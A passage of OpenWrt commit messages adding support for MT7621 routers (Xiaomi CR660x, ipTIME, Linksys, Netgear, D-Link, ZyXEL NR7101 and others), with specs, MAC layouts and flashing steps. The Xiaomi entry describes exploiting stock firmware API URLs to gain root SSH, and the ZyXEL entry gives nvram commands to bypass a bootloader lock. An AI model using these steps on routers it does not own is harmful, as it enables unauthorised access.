http://169.254.31.1/cgi-bin/luci/api/xqsystem/token still have a similar result as 1.2.3 shows. 1.3. On the Xiaomi CR660x: 1.3.1. Login to the web interface. Your would be directed to a page with URL like this: http://{ROUTER_ADDR}/cgi-bin/luci/;stok={STOK}/web/home#r- outer 1.3.2. Browse this URL with {STOK} from 1.3.1, {WIFI_NAME} {PASSWORD} be your OpenWrt router's SSID and password: http://{MIROUTER_ADDR}/cgi-bin/luci/;stok={STOK}/api/misy- stem/extendwifi_connect?ssid={WIFI_NAME}&password={PASSWO- RD} It should return 0. 1.3.3. Browse this URL with {STOK} from 1.3.1: http://{MIROUTER_ADDR}/cgi-bin/luci/;stok={STOK}/api/xqsy- stem/oneclick_get_remote_token?username=xxx&password=xxx&- nonce=xxx 1.4. Before rebooting, you can now access your CR660x via SSH. For CR6606, you can calculate your root password by this project: https://github.com/wfjsw/xiaoqiang-root-password, or at https://www.oxygen7.cn/miwifi. The root password for carrier-specific models should be the admi- nistration password or the default login password on the label. It is also feasible to change the root password at the same time by modifying the script from step 1.2.2. You can treat OpenWrt Router however you like from this point as long as you don't mind go through this again if you have to expl- oit it again. If you do have to and left your OpenWrt router unt- ouched, start from 1.3. 2. There's no official binary firmware available, and if you lose the content of your flash, no one except Xiaomi can help you. Dump these partitions in case you need them: "Bootloader" "Nvram" "Bdata" "crash" "crash_log" "firmware" "firmware1" "overlay" "obr" Find the corespond block device from /proc/mtd Read from read-only block device to avoid misoperation. It's recommended to use /tmp/syslogbackup/ as destination, since files would be available at http://{ROUTER_ADDR}/backup/log/YOUR_DUMP Keep an eye on memory usage though. 3. Since UART access is locked ootb, you should get UART access by modify uboot env. Otherwise, your router may become bricked. Excute these in stock firmware shell: a. nvram set boot_wait=on b. nvram set bootdelay=3 c. nvram commit Or in OpenWrt: a. opkg update && opkg install kmod-mtd-rw b. insmod mtd-rw i_want_a_brick=1 c. fw_setenv boot_wait on d. fw_setenv bootdelay 3 e. rmmod mtd-rw Migrate to OpenWrt: 1. Transfer squashfs-firmware.bin to the router. 2. nvram set flag_try_sys1_failed=0 3. nvram set flag_try_sys2_failed=1 4. nvram commit 5. mtd -r write /path/to/image/squashfs-firmware.bin firmware Additional Info: 1. CR660x series routers has a different nand layout compared to other Xiaomi nand devices. 2. This router has a relatively fresh uboot (2018.09) compared to other Xiaomi devices, and it is capable of booting fit image firmware. Unfortunately, no successful attempt of booting OpenWrt fit image were made so far. The cause is still yet to be known. For now, we use legacy image instead. Signed-off-by: Raymond Wang <infiwang@pm.me> |
||
Stijn Tintel
|
cd6a6e3030 |
Revert "ramips: add support for ipTIME AX2004M"
Commit |
||
Sungbo Eo
|
f4a79148f8 |
ramips: add support for ipTIME AX2004M
ipTIME AX2004M is an 802.11ax (Wi-Fi 6) router, based on MediaTek MT7621A. Specification: * SoC: MT7621A * RAM: 256 MiB * Flash: NAND 128 MiB * Wi-Fi: * MT7915D: 2.4/5 GHz (DBDC) * Ethernet: 5x 1GbE * Switch: SoC built-in * USB: 1x 3.0 * UART: J4 (115200 baud) * Pinout: [3V3] (TXD) (RXD) (GND) MAC address: | interface | MAC | source | comment |-----------|-------------------|----------------|--------- | LAN | 58:XX:XX:00:XX:9B | | [1] | WAN | 58:XX:XX:00:XX:99 | | | WLAN 2G | 58:XX:XX:00:XX:98 | factory 0x4 | | WLAN 5G | 5A:XX:XX:40:XX:98 | | | | | | | | 58:XX:XX:00:XX:98 | config ethaddr | [1] Used in this patch as WLAN 5G MAC address with the local bit set Load address: * stock * 0x80010000: FIT image * 0x81001000: kernel image -> entry * OpenWrt * 0x80010000: FIT image * 0x82000000: uncompressed kernel+relocate image * 0x80001000: relocated kernel image -> entry Installation via **recovery** mode: 1. Press reset button, power up the device, wait >10s for CPU LED to stop blinking. 2. Upload recovery image through the recovery web page at 192.168.0.1. Revert to stock firmware: 1. Install stock image via recovery mode. Signed-off-by: Sungbo Eo <mans0n@gorani.run> |
||
Nick McKinney
|
e0a574d4b7 |
ramips: add support for Linksys EA6350 v4
Specifications: - SoC: MT7621DAT (880MHz, 2 Cores) - RAM: 128 MB - Flash: 128 MB NAND - Ethernet: 5x 1GiE MT7530 - WiFi: MT7603/MT7613 - USB: 1x USB 3.0 This is another MT7621 device, very similar to other Linksys EA7300 series devices. Installation: Upload the generated factory.bin image via the stock web firmware updater. Reverting to factory firmware: Like other EA7300 devices, this device has an A/B router configuration to prevent bricking. Hard-resetting this device three (3) times will put the device in failsafe (default) mode. At this point, flash the OEM image to itself and reboot. This puts the router back into the 'B' image and allows for a firmware upgrade. Troubleshooting: If the firmware will not boot, first restore the factory as described above. This will then allow the factory.bin update to be applied properly. Signed-off-by: Nick McKinney <nick@ndmckinney.net> |
||
Liangkuan Yang
|
bc7d36ba3a |
ramips: add support for RAISECOM MSG1500 X.00
RAISECOM MSG1500 X.00 is a 2.4/5 GHz band 11ac (Wi-Fi 5) router. Apart from the general model, there are two ISP customized models: China Mobile and China Telecom. Specifications: - SoC: Mediatek MT7621AT - RAM: 256MiB DDR3 - Flash: 128MiB NAND - Ethernet: 5 * 10/100/1000Mbps: 4 * LAN + 1 * WAN - Switch: MediaTek MT7530 (SoC) - WLAN: 1 * MT7615DN Dual-Band 2.4GHz 2T2R (400Mbps) 5GHz 2T2R (867Mbps) - USB: 1 * USB 2.0 port - Button: 1 * RESET button, 1 * WPS button, 1 * WIFI button - LED: blue color: POWER, WAN, WPS, 2.4G, 5G, LAN1, LAN2, LAN3, LAN4, USB - UART: 1 * serial port header (4-pin) - Power: DC 12V, 1A - Switch: 1 * POWER switch MAC addresses as verified by vendor firmware: use address source LAN C8:XX:XX:3A:XX:E7 Config "protest_lan_mac" ascii (label) WAN C8:XX:XX:3A:XX:EA Config "protest_wan_mac" ascii 5G C8:XX:XX:3A:XX:E8 Factory "0x4" hex 2.4G CA:XX:XX:4A:XX:E8 [not on flash] The increment of the 4th byte for the 2.4g address appears to vary. Reported cases: 5g 2.4g increment C8:XX:XX:90:XX:C3 CA:XX:XX:C0:XX:C3 0x30 C8:XX:XX:3A:XX:08 CA:XX:XX:4A:XX:08 0x10 C8:XX:XX:3A:XX:E8 CA:XX:XX:4A:XX:E8 0x10 Since increment is inconsistent and there is no obvious pattern in swapping bytes, and the 2.4g address has local bit set anyway, it seems safer to use the LAN address with flipped byte here in order to prevent collisions between OpenWrt devices and OEM devices for this interface. This way we at least use an address as base that is definitely owned by the device at hand. Notes: 1. The vendor firmware allows you to connect to the router by telnet. (known version 1.0.0 can open telnet.) There is no official binary firmware available. Backup the important partitions data: "Bootloader", "Config", "Factory", and "firmware". Note that with the vendor firmware the memory is detected only 128MiB and the last 512KiB in NAND flash is not used. 2. The POWER LED is default on after press POWER switch. The WAN and LAN1 - 4 LEDs are wired to ethernet switch. The WPS LED is controlled by MT7615DN's GPIO. Currently there is no proper way to configure it. 3. At the time of adding support the wireless config needs to be set up by editing the wireless config file: * Setting the country code is mandatory, otherwise the router loses connectivity at the next reboot. This is mandatory and can be done from luci. After setting the country code the router boots correctly. A reset with the reset button will fix the issue and the user has to reconfigure. * This is minor since the 5g interface does not come up online although it is not set as disabled. 2 options here: 1- Either run the "wifi" command. Can be added from LuCI in system - startup - local startup and just add wifi above "exit 0". 2- Or add the serialize option in the wireless config file as shown below. This one would work and bring both interfaces automatically at every boot: config wifi-device 'radio0' option serialize '1' config wifi-device 'radio1' option serialize '1' Flash instructions using initramfs image: 1. Press POWER switch to power down if the router is running. 2. Connect PC to one of LAN ports, and set static IP address to "10.10.10.2", netmask to "255.255.255.0", and gateway to "10.10.10.1" manually on the PC. 3. Push and hold the WIFI button, and then power up the router. After about 10s (or you can call the recovery page, see "4" below) you can release the WIFI button. There is no clear indication when the router is entering or has entered into "RAISECOM Router Recovery Mode". 4. Call the recovery page for the router at "http://10.10.10.1". Keep an eye on the "WARNING!! tip" of the recovery page. Click "Choose File" to select initramfs image, then click "Upload". 5. If image is uploaded successfully, you will see the page display "Device is upgrading the firmware... %". Keep an eye on the "WARNING!! tip" of the recovery page. When the page display "Upgrade Successfully", you can set IP address as "automatically obtain". 6. After the rebooting (PC should automatically obtain an IP address), open the SSH connection, then download the sysupgrade image to the router and perform sysupgrade with it. Flash back to vendor firmware: See "Flash instructions 1 - 5" above. The only difference is that in step 4 you should select the vendor firmware which you backup. Signed-off-by: Liangkuan Yang <ylk951207@gmail.com> |
||
Sungbo Eo
|
a1deab0ec9 |
ramips: add support for ipTIME T5004
ipTIME T5004 is a 5-port Gigabit Ethernet router, based on MediaTek MT7621A. Specifications: * SoC: MT7621AT * RAM: 128 MiB * Flash: NAND 128 MiB * Ethernet: 5x 1GbE * Switch: SoC built-in * UART: J4 (57600 baud) * Pinout: [3V3] (TXD) (RXD) (GND) Installation via web interface: 1. Flash **initramfs** image through the stock web interface. 2. Boot into OpenWrt and perform sysupgrade with sysupgrade image. Revert to stock firmware via recovery mode: 1. Press reset button, power up the device, wait >15s for CPU LED to stop blinking. 2. Upload stock image to TFTP server at 192.168.0.1. Signed-off-by: Sungbo Eo <mans0n@gorani.run> |
||
WonJung Kim
|
2dde2416e1 |
ramips: add support for ipTIME A3004T
ipTIME A3004T is a 2.4/5GHz band router, based on Mediatek MT7621. Specifications: - SoC: MT7621 (880MHz) - RAM: DDR3 256M - Flash: NAND 128MB (Macronix NAND 128MiB 3,3V 8-bit) - WiFi: - 2.4GHz: MT7615E - 5GHz : MT7615E - Ethernet: - 4x LAN - 1x WAN - USB: 1 * USB3.0 port - UART: - 3.3V, TX, RX, GND / 57600 8N1 Installation via web interface: 1. Flash initramfs image using OEM's Recovery mode 2. Boot into OpenWrt and perform sysupgrade with sysupgrade image. Revert to stock firmware: - Flash stock firmware via OEM's Recovery mode How to use OEM's Recovery mode: 1. Power up with holding down the reset key until CPU LED stop blinking. 2. Set fixed ip with `192.168.0.2` with subnet mask `255.255.255.0` 3. Flash image via tftp to `192.168.0.1` Additional Notes: This router shares one MT7915E chip for both 2.4Ghz/5Ghz. radio0 will not working on 5Ghz as it's not connected to the antenna. Signed-off-by: WonJung Kim <git@won-jung.kim> (added led dt-bindings) Signed-off-by: Christian Lamparter <chunkeey@gmail.com> |
||
Dale Hui
|
830c2e5378 |
ramips: add support for Netgear R7450
Netgear R7450 is a clone of Netgear R6700v2 Specifications ============== SoC: MediaTek MT7621AT RAM: 256M DDR3 FLASH: 128M NAND WiFi: MediaTek MT7615N an+ac MediaTek MT7615N bgn ETH: MediaTek MT7621AT BTN: 1x Connect (WPS), 1x WLAN, 1x Reset LED: Power (white/amber), WAN(white/amber), 2.4G(white), 5G(white), USB(white) , GuestWifi(white) 4x LAN(white/amber), Wifi Button(white), WPS Button(white) Flash Instructions ================== Login to netgear webinterface and flash factory.img Signed-off-by: Dale Hui <strokes-races0b@icloud.com> [fix model/compatible in DTS] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Dale Hui
|
16fc409e7a |
ramips: add support for Netgear R6900v2
Netgear R6900v2 is a clone of Netgear R6700v2 Specifications ============== SoC: MediaTek MT7621AT RAM: 256M DDR3 FLASH: 128M NAND WiFi: MediaTek MT7615N an+ac MediaTek MT7615N bgn ETH: MediaTek MT7621AT BTN: 1x Connect (WPS), 1x WLAN, 1x Reset LED: Power (white/amber), WAN(white/amber), 2.4G(white), 5G(white), USB(white) , GuestWifi(white) 4x LAN(white/amber), Wifi Button(white), WPS Button(white) Flash Instructions ================== Login to netgear webinterface and flash factory.img Signed-off-by: Dale Hui <strokes-races0b@icloud.com> |
||
Dale Hui
|
af3104d25b |
ramips: make Netgear R7200 a separate device from R6700v2
With the various variants of Netgear R**** devices, make it more obvious which image should be used for the R7200. Signed-off-by: Dale Hui <strokes-races0b@icloud.com> [provide proper commit message] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
INAGAKI Hiroshi
|
7ff0efa0b0 |
ramips: add support for I-O DATA WN-DX2033GR
I-O DATA WN-DX2033GR is a 2.4/5 GHz band 11ac (Wi-Fi 5) router, based on MT7621A. Specification: - SoC : MediaTek MT7621A - RAM : DDR3 128 MiB - Flash : Raw NAND 128 MiB (Macronix MX30LF1G18AC-TI) - WLAN : 2.4/5 GHz - 2.4 GHz : 2T2R, MediaTek MT7603E - 5 GHz : 4T4R, MediaTek MT7615 - Ethernet : 5x 10/100/1000 Mbps - Switch : MediaTek MT7530 (SoC) - LEDs/Keys : 2x/3x (2x buttons, 1x slide-switch) - UART : through-hole on PCB - J5: 3.3V, TX, RX, NC, GND from triangle mark - 57600n8 - Power : 12 VDC, 1 A Flash instruction using initramfs image: 1. Boot WN-DX2033GR normally 2. Access to "http://192.168.0.1/" and open firmware update page ("ファームウェア") 3. Select the OpenWrt initramfs image and click update ("更新") button to perform firmware update 4. On the initramfs image, download the sysupgrade.bin image to the device and perform sysupgrade with it 5. Wait ~120 seconds to complete flashing Notes: - The hardware of WN-DX2033GR and WN-AX2033GR are almost the same, and it is certified under the same radio-wave related regulations in Japan - The last 0x80000 (512 KiB) in NAND flash is not used on stock firmware - stock firmware requires "customized uImage header" (called as "combo image") by MSTC (MitraStar Technology Corp.), but U-Boot doesn't - uImage magic ( 0x0 - 0x3 ) : 0x434F4D42 ("COMB") - header crc32 ( 0x4 - 0x7 ) : with "data length" and "data crc32" - image name (0x20 - 0x37) : model ID and firmware versions - data length (0x38 - 0x3b) : kernel + rootfs - data crc32 (0x3c - 0x3f) : kernel + rootfs - There are 2x important flags in the flash: - bootnum : select os partition for booting (persist, 0x4) - 0x01: firmware - 0x02: firmware_2 - debugflag : allow interrupt kernel loader, it's named as "Z-LOADER" (Factory, 0xFE75) - 0x00: disable debug - 0x01: enable debug MAC addresses: LAN : 50:41:B9:xx:xx:90 (Factory, 0xE000 (hex) / Ubootenv, ethaddr (text)) WAN : 50:41:B9:xx:xx:92 (Factory, 0xE006 (hex)) 2.4 GHz : 50:41:B9:xx:xx:90 (Factory, 0x4 (hex)) 5 GHz : 50:41:B9:xx:xx:91 (Factory, 0x8004 (hex)) Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com> |
||
Karim Dehouche
|
6639623e75 |
ramips: add support for D-Link DIR-853 A3
Specifications: * SoC: MT7621AT * RAM: 256MB * Flash: 128MB NAND flash * WiFi: MT7615DN (2.4GHz+5Ghz) with DBDC * LAN: 5x1000M * Firmware layout is Uboot with extra 96 bytes in header * Base PCB is DIR-1360 REV1.0 * LEDs Power Blue+Orange,Wan Blue+Orange,WPS Blue,"2.4G"Blue, "5G" Blue, USB Blue * Buttons Reset,WPS, Wifi MAC addresses on OEM firmware: lan factory 0xe000 f4:*:*:a8:*:65 (label) wan factory 0xe006 f4:*:*:a8:*:68 2.4 GHz [not on flash] f6:*:*:c8:*:66 5.0 GHz factory 0x4 f4:*:*:a8:*:66 The increment of the 4th byte for the 2.4g address appears to vary. Reported cases: 5g 2.4g increment f4:XX:XX:a8:XX:66 f6:XX:XX:c8:XX:66 +0x20 x0:xx:xx:68:xx:xx x2:xx:xx:48:xx:xx -0x20 x4:xx:xx:6a:xx:xx x6:xx:xx:4a:xx:xx -0x20 Since increment is inconsistent and there is no obvious pattern in swapping bytes, and the 2.4g address has local bit set anyway, it seems safer to use the LAN address with flipped byte here in order to prevent collisions between OpenWrt devices and OEM devices for this interface. This way we at least use an address as base that is definitely owned by the device at hand. Flashing instruction: The Dlink "Emergency Room" cannot be accessed through the reset button on this device. You can either use console or use the encrypted factory image availble in the openwrt forum. Once the encrypted image is flashed throuh the stock Dlink web interface, the sysupgrade images can be used. Header pins needs to be soldered near the WPS and Wifi buttons. The layout for the pins is (VCC,RX,TX,GND). No need to connect the VCC. the settings are: Bps/Par/Bits : 57600 8N1 Hardware Flow Control : No Software Flow Control : No Connect your client computer to LAN1 of the device Set your client IP address manually to 192.168.0.101 / 255.255.255.0. Call the recovery page or tftp for the device at http://192.168.0.1 Use the provided emergency web GUI to upload and flash a new firmware to the device At the time of adding support the wireless config needs to be set up by editing the wireless config file: * Setting the country code is mandatory, otherwise the router loses connectivity at the next reboot. This is mandatory and can be done from luci. After setting the country code the router boots correctly. A reset with the reset button will fix the issue and the user has to reconfigure. * This is minor since the 5g interface does not come up online although it is not set as disabled. 2 options here: 1- Either run the "wifi" command. Can be added from LUCI in system - startup - local startup and just add wifi above "exit 0". 2- Or add the serialize option in the wireless config file as shown below. This one would work and bring both interfaces automatically at every boot: config wifi-device 'radio0' option serialize '1' config wifi-device 'radio1' option serialize '1' Signed-off-by: Karim Dehouche <karimdplay@gmail.com> [rebase, improve MAC table, update wireless config comment, fix 2.4g macaddr setup] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Tee Hao Wei
|
0c721434ea |
ramips: add support for Linksys EA8100 v2
Specifications: - SoC: MT7621AT - RAM: 256MB - Flash: 128MB NAND - Ethernet: 5 Gigabit ports - WiFi: 2.4G/5G MT7615N - USB: 1 USB 3.0, 1 USB 2.0 This device is very similar to the EA7300 v1/v2, EA7500 v2, and EA8100 v1. Installation: Upload the generated factory image through the factory web interface. (following part taken from EA7300 v2 commit message:) This might fail due to the A/B nature of this device. When flashing, OEM firmware writes over the non-booted partition. If booted from 'A', flashing over 'B' won't work. To get around this, you should flash the OEM image over itself. This will then boot the router from 'B' and allow you to flash OpenWRT without problems. Reverting to factory firmware: Hard-reset the router three times to force it to boot from 'B.' This is where the stock firmware resides. To remove any traces of OpenWRT from your router simply flash the OEM image at this point. With thanks to Tom Wizetek (@wizetek) for testing. Signed-off-by: Tee Hao Wei <angelsl@in04.sg> |
||
Andreas Böhler
|
a3d8c1295e |
ramips: Add support for SERCOMM NA502
The SERCOMM NA502 is a smart home gateway manufactured by SERCOMM and sold under different brands (among others, A1 Telekom Austria SmartHome Gateway). It has multi-protocol radio support in addition to LAN and WiFi. Note: BLE is currently unsupported. Specifications -------------- - MT7621ST 880MHz, Single-Core, Dual-Thread - MT7603EN 2.4GHz WiFi - MT7662EN 5GHz WiFi + BLE - 128MiB NAND - 256MiB DDR3 RAM - SD3503 ZWave Controller - EM357 Zigbee Coordinator MAC address assignment ---------------------- LAN MAC is read from the config partition, WiFi 2.4GHz is LAN+2 and matches the OEM firmware. WiFi 5GHz with LAN+1 is an educated guess since the OEM firmware does not enable 5GHz WiFi. Installation ------------ Attach serial console, then boot the initramfs image via TFTP. Once inside OpenWrt, run sysupgrade -n with the sysupgrade file. Attention: The device has a dual-firmware design. We overwrite kernel2, since kernel1 contains an automatic recovery image. If you get NAND ECC errors and are stuck with bad eraseblocks, try to erase the mtd partition first with mtd unlock ubi mtd erase ubi This should only be needed once. Signed-off-by: Andreas Böhler <dev@aboehler.at> [use kiB for IMAGE_SIZE] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Tee Hao Wei
|
b232680f84 |
ramips: add support for Linksys EA8100 v1
Specifications: - SoC: MT7621AT - RAM: 256MB - Flash: 128MB NAND - Ethernet: 5 Gigabit ports - WiFi: 2.4G/5G MT7615N - USB: 1 USB 3.0, 1 USB 2.0 This device is very similar to the EA7300 v1/v2 and EA7500 v2. Installation: Upload the generated factory image through the factory web interface. (following part taken from EA7300 v2 commit message:) This might fail due to the A/B nature of this device. When flashing, OEM firmware writes over the non-booted partition. If booted from 'A', flashing over 'B' won't work. To get around this, you should flash the OEM image over itself. This will then boot the router from 'B' and allow you to flash OpenWRT without problems. Reverting to factory firmware: Hard-reset the router three times to force it to boot from 'B.' This is where the stock firmware resides. To remove any traces of OpenWRT from your router simply flash the OEM image at this point. With thanks to Leon Poon (@LeonPoon) for the initial bringup. Signed-off-by: Tee Hao Wei <angelsl@in04.sg> [add missing entry in 10_fix_wifi_mac] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Jonathan Sturges
|
6d23e474ad |
ramips: add support for Amped Wireless ALLY router and extender
Amped Wireless ALLY is a whole-home WiFi kit, with a router (model ALLY-R1900K) and an Extender (model ALLY-00X19K). Both are devices are 11ac and based on MediaTek MT7621AT and MT7615N chips. The units are nearly identical, except the Extender lacks a USB port and has a single Ethernet port. Specification: - SoC: MediaTek MT7621AT (2C/4T) @ 880MHz - RAM: 128MB DDR3 (Nanya NT5CC64M16GP-DI) - FLASH: 128MB NAND (Winbond W29N01GVSIAA) - WiFi: 2.4/5 GHz 4T4R - 2.4GHz MediaTek MT7615N bgn - 5GHz MediaTek MT7615N nac - Switch: SoC integrated Gigabit Switch - USB: 1x USB3 (Router only) - BTN: Reset, WPS - LED: single RGB - UART: through-hole on PCB. J1: pin1 (square pad, towards rear)=3.3V, pin2=RX, pin3=GND, pin4=TX. Settings: 57600/8N1. Note regarding dual system partitions ------------------------------------- The vendor firmware and boot loader use a dual partition scheme. The boot partition is decided by the bootImage U-boot environment variable: 0 for the 1st partition, 1 for the 2nd. OpenWrt does not support this scheme and will always use the first OS partition. It will set bootImage to 0 during installation, making sure the first partition is selected by the boot loader. Also, because we can't be sure which partition is active to begin with, a 2-step flash process is used. We first flash an initramfs image, then follow with a regular sysupgrade. Installation: Router (ALLY-R1900K) 1) Install the flashable initramfs image via the OEM web-interface. (Alternatively, you can use the TFTP recovery method below.) You can use WiFi or Ethernet. The direct URL is: http://192.168.3.1/07_06_00_firmware.html a. No login is needed, and you'll be in their setup wizard. b. You might get a warning about not being connected to the Internet. c. Towards the bottom of the page will be a section entitled "Or Manually Upgrade Firmware from a File:" where you can manually choose and upload a firmware file. d: Click "Choose File", select the OpenWRT "initramfs" image and click "Upload." 2) The Router will flash the OpenWrt initramfs image and reboot. After booting, LuCI will be available on 192.168.1.1. 3) Log into LuCI as root; there is no password. 4) Optional (but recommended) is to backup the OEM firmware before continuing; see process below. 5) Complete the Installation by flashing a full OpenWRT image. Note: you may use the sysupgrade command line tool in lieu of the UI if you prefer. a. Choose System -> Backup/Flash Firmware. b. Click "Flash Image..." under "Flash new firmware image" c. Click "Browse..." and then select the sysupgrade file. d. Click Upload to upload the sysupgrade file. e. Important: uncheck "Keep settings and retain the current configuration" for this initial installation. f. Click "Continue" to flash the firmware. g. The device will reboot and OpenWRT is installed. Extender (ALLY-00X19K) 1) This device requires a TFTP recovery procedure to do an initial load of OpenWRT. Start by configuring a computer as a TFTP client: a. Install a TFTP client (server not necessary) b. Configure an Ethernet interface to 192.168.1.x/24; don't use .1 or .6 c. Connect the Ethernet to the sole Ethernet port on the X19K. 2) Put the ALLY Extender in TFTP recovery mode. a. Do this by pressing and holding the reset button on the bottom while connecting the power. b. As soon as the LED lights up green (roughly 2-3 seconds), release the button. 3) Start the TFTP transfer of the Initramfs image from your setup machine. For example, from Linux: tftp -v -m binary 192.168.1.6 69 -c put initramfs.bin 4) The Extender will flash the OpenWrt initramfs image and reboot. After booting, LuCI will be available on 192.168.1.1. 5) Log into LuCI as root; there is no password. 6) Optional (but recommended) is to backup the OEM firmware before continuing; see process below. 7) Complete the Installation by flashing a full OpenWRT image. Note: you may use the sysupgrade command line tool in lieu of the UI if you prefer. a. Choose System -> Backup/Flash Firmware. b. Click "Flash Image..." under "Flash new firmware image" c. Click "Browse..." and then select the sysupgrade file. d. Click Upload to upload the sysupgrade file. e. Important: uncheck "Keep settings and retain the current configuration" for this initial installation. f. Click "Continue" to flash the firmware. g. The device will reboot and OpenWRT is installed. Backup the OEM Firmware: ----------------------- There isn't any downloadable firmware for the ALLY devices on the Amped Wireless web site. Reverting back to the OEM firmware is not possible unless we have a backup of the original OEM firmware. The OEM firmware may be stored on either /dev/mtd3 ("firmware") or /dev/mtd6 ("oem"). We can't be sure which was overwritten with the initramfs image, so backup both partitions to be safe. 1) Once logged into LuCI, navigate to System -> Backup/Flash Firmware. 2) Under "Save mtdblock contents," first select "firmware" and click "Save mtdblock" to download the image. 3) Repeat the process, but select "oem" from the pull-down menu. Revert to the OEM Firmware: -------------------------- * U-boot TFTP: Follow the TFTP recovery steps for the Extender, and use the backup image. * OpenWrt "Flash Firmware" interface: Upload the backup image and select "Force update" before continuing. Signed-off-by: Jonathan Sturges <jsturges@redhat.com> |
||
Aashish Kulkarni
|
251c995cbb |
ramips: add support for Linksys E5600
This submission relied heavily on the work of Linksys EA7300 v1/ v2. Specifications: * SoC: MediaTek MT7621A (880 MHz 2c/4t) * RAM: 128M DDR3-1600 * Flash: 128M NAND * Eth: MediaTek MT7621A (10/100/1000 Mbps x5) * Radio: MT7603E/MT7613BE (2.4 GHz & 5 GHz) * Antennae: 2 internal fixed in the casing and 2 on the PCB * LEDs: Blue (x4 Ethernet) Blue+Orange (x2 Power + WPS and Internet) * Buttons: Reset (x1) WPS (x1) Installation: Flash factory image through GUI. This device has 2 partitions for the firmware called firmware and alt_firmware. To successfully flash and boot the device, the device should have been running from alt_firmware partition. To get the device booted through alt_firmware partition, download the OEM firmware from Linksys website and upgrade the firmware from web GUI. Once this is done, flash the OpenWrt Factory firmware from web GUI. Reverting to factory firmware: 1. Boot to 'alt_firmware'(where stock firmware resides) by doing one of the following: Press the "wps" button as soon as power LED turns on when booting. (OR) Hard-reset the router consecutively three times to force it to boot from 'alt_firmware'. 2. To remove any traces of OpenWRT from your router simply flash the OEM image at this point. Signed-off-by: Aashish Kulkarni <aashishkul@gmail.com> [fix hanging indents and wrap to 74 characters per line, add kmod-mt7663-firmware-sta package for 5GHz STA mode to work, remove sysupgrade.bin and concatenate IMAGES instead in mt7621.mk, set default-state "on" for power LED] Signed-off-by: Sannihith Kinnera <digislayer@protonmail.com> [move check-size before append-metadata, remove trailing whitespace] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Chukun Pan
|
57cb387cfe |
ramips: add support for JCG Q20
JCG Q20 is an AX 1800M router. Hardware specs: SoC: MediaTek MT7621AT Flash: Winbond W29N01HV 128 MiB RAM: Winbond W632GU6NB-11 256 MiB WiFi: MT7915 2.4/5 GHz 2T2R Ethernet: 10/100/1000 Mbps x3 LED: Status (red / blue) Button: Reset, WPS Power: DC 12V,1A Flash instructions: Upload factory.bin in stock firmware's upgrade page, do not preserve settings. MAC addresses map: 0x00004 *:3e wlan2g/wlan5g 0x3fff4 *:3c lan/label 0x3fffa *:3c wan Signed-off-by: Chukun Pan <amadeus@jmu.edu.cn> |
||
Bjørn Mork
|
2449a63208 |
ramips: mt7621: Add support for ZyXEL NR7101
The ZyXEL NR7101 is an 802.3at PoE powered 5G outdoor (IP68) CPE with integrated directional 5G/LTE antennas. Specifications: - SoC: MediaTek MT7621AT - RAM: 256 MB - Flash: 128 MB MB NAND (MX30LF1G18AC) - WiFi: MediaTek MT7603E - Switch: 1 LAN port (Gigabiti) - 5G/LTE: Quectel RG502Q-EA connected by USB3 to SoC - SIM: 2 micro-SIM slots under transparent cover - Buttons: Reset, WLAN under same cover - LEDs: Multicolour green/red/yellow under same cover (visible) - Power: 802.3at PoE via LAN port The device is built as an outdoor ethernet to 5G/LTE bridge or router. The Wifi interface is intended for installation and/or temporary management purposes only. UART Serial: 57600N1 Located on populated 5 pin header J5: [o] GND [ ] key - no pin [o] RX [o] TX [o] 3.3V Vcc Remove the SIM/button/LED cover, the WLAN button and 12 screws holding the back plate and antenna cover together. The GPS antenna is fixed to the cover, so be careful with the cable. Remove 4 screws fixing the antenna board to the main board, again being careful with the cables. A bluetooth TTL adapter is recommended for permanent console access, to keep the router water and dustproof. The 3.3V pin is able to power such an adapter. MAC addresses: OpenWrt OEM Address Found as lan eth2 08:26:97:*:*:BC Factory 0xe000 (hex), label wlan0 ra0 08:26:97:*:*:BD Factory 0x4 (hex) wwan0 usb0 random WARNING!! ISP managed firmware might at any time update itself to a version where all known workarounds have been disabled. Never boot an ISP managed firmware with a SIM in any of the slots if you intend to use the router with OpenWrt. The bootloader lock can only be disabled with root access to running firmware. The flash chip is physically inaccessible without soldering. Installation from OEM web GUI: - Log in as "supervisor" on https://172.17.1.1/ - Upload OpenWrt initramfs-recovery.bin image on the Maintenance -> Firmware page - Wait for OpenWrt to boot and ssh to root@192.168.1.1 - (optional) Copy OpenWrt to the recovery partition. See below - Sysupgrade to the OpenWrt sysupgrade image and reboot Installation from OEM ssh: - Log in as "root" on 172.17.1.1 port 22022 - scp OpenWrt initramfs-recovery.bin image to 172.17.1.1:/tmp - Prepare bootloader config by running: nvram setro uboot DebugFlag 0x1 nvram setro uboot CheckBypass 0 nvram commit - Run "mtd_write -w write initramfs-recovery.bin Kernel" and reboot - Wait for OpenWrt to boot and ssh to root@192.168.1.1 - (optional) Copy OpenWrt to the recovery partition. See below - Sysupgrade to the OpenWrt sysupgrade image and reboot Copying OpenWrt to the recovery partition: - Verify that you are running a working OpenWrt recovery image from flash - ssh to root@192.168.1.1 and run: fw_setenv CheckBypass 0 mtd -r erase Kernel2 - Wait while the bootloader mirrors Image1 to Image2 NOTE: This should only be done after successfully booting the OpenWrt recovery image from the primary partition during installation. Do not do this after having sysupgraded OpenWrt! Reinstalling the recovery image on normal upgrades is not required or recommended. Installation from Z-Loader: - Halt boot by pressing Escape on console - Set up a tftp server to serve the OpenWrt initramfs-recovery.bin image at 10.10.10.3 - Type "ATNR 1,initramfs-recovery.bin" at the "ZLB>" prompt - Wait for OpenWrt to boot and ssh to root@192.168.1.1 - Sysupgrade to the OpenWrt sysupgrade image NOTE: ATNR will write the recovery image to both primary and recovery partitions in one go. Booting from RAM: - Halt boot by pressing Escape on console - Type "ATGU" at the "ZLB>" prompt to enter the U-Boot menu - Press "4" to select "4: Entr boot command line interface." - Set up a tftp server to serve the OpenWrt initramfs-recovery.bin image at 10.10.10.3 - Load it using "tftpboot 0x88000000 initramfs-recovery.bin" - Boot with "bootm 0x8800017C" to skip the 380 (0x17C) bytes ZyXEL header This method can also be used to RAM boot OEM firmware. The warning regarding OEM applies! Never boot an unknown OEM firmware, or any OEM firmware with a SIM in any 